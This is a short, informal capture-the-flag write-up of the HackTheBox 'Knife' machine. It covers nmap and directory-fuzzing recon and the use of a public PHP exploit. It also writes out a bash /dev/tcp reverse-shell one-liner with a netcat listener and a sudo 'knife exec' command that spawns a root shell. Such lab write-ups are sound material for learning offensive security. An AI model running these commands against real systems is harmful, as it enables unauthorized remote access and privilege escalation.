HackTheBox: Knife | My Journey

Let’s start with recon using nmap

nmap -sV -sS -A 10.10.10.242

Great, 2 port are open. let’s check the http server.

nothing special huh. let’s take some directory fuzzing.

python3 dirsearch.py -u 10.10.10.242

200     6KB  http://10.10.10.242:80/index.php
200     6KB  http://10.10.10.242:80/index.php/login

a login page?

nope. That just rabbit hole (?). The page still rendering index.php

okay.. move to next step. Let’s check what technologies this website use. I use wallaplyzer here

Maybe there’s outdated tech? Let’s check if PHP have any CVE.

And fortunally, there was.
https://www.exploit-db.com/exploits/49933

Download the exploit and execute it.

and i got user shell.

But because this shell isn’t too inteactive ( cant move to other directories ), so i gonna make reverse shell first.

host :

nc -lvp 4242

victim :

echo "bash -i >& /dev/tcp/10.10.16.60/4242 0>&1" > /tmp/shell.sh
chmod +x /tmp/shell.sh
bash /tmp/shell.sh

Okay, let’s see if we can doing privilege escalation. I use sudo -l as usual.

As you can see, i can execute program calles knife with sudo. Let’s check this interesting program with executing it.

there’s a lot of sub-command that you can use. I check it one per one until i found something interesting.

After reading the documentation, i found something interesting about that subcommand.

Source : https://docs.chef.io/workstation/knife_exec/

Let’s see if we can execute ruby command to gain root shell.

sudo /usr/bin/knife exec -E "exec('/bin/bash -i')"

and gotcha.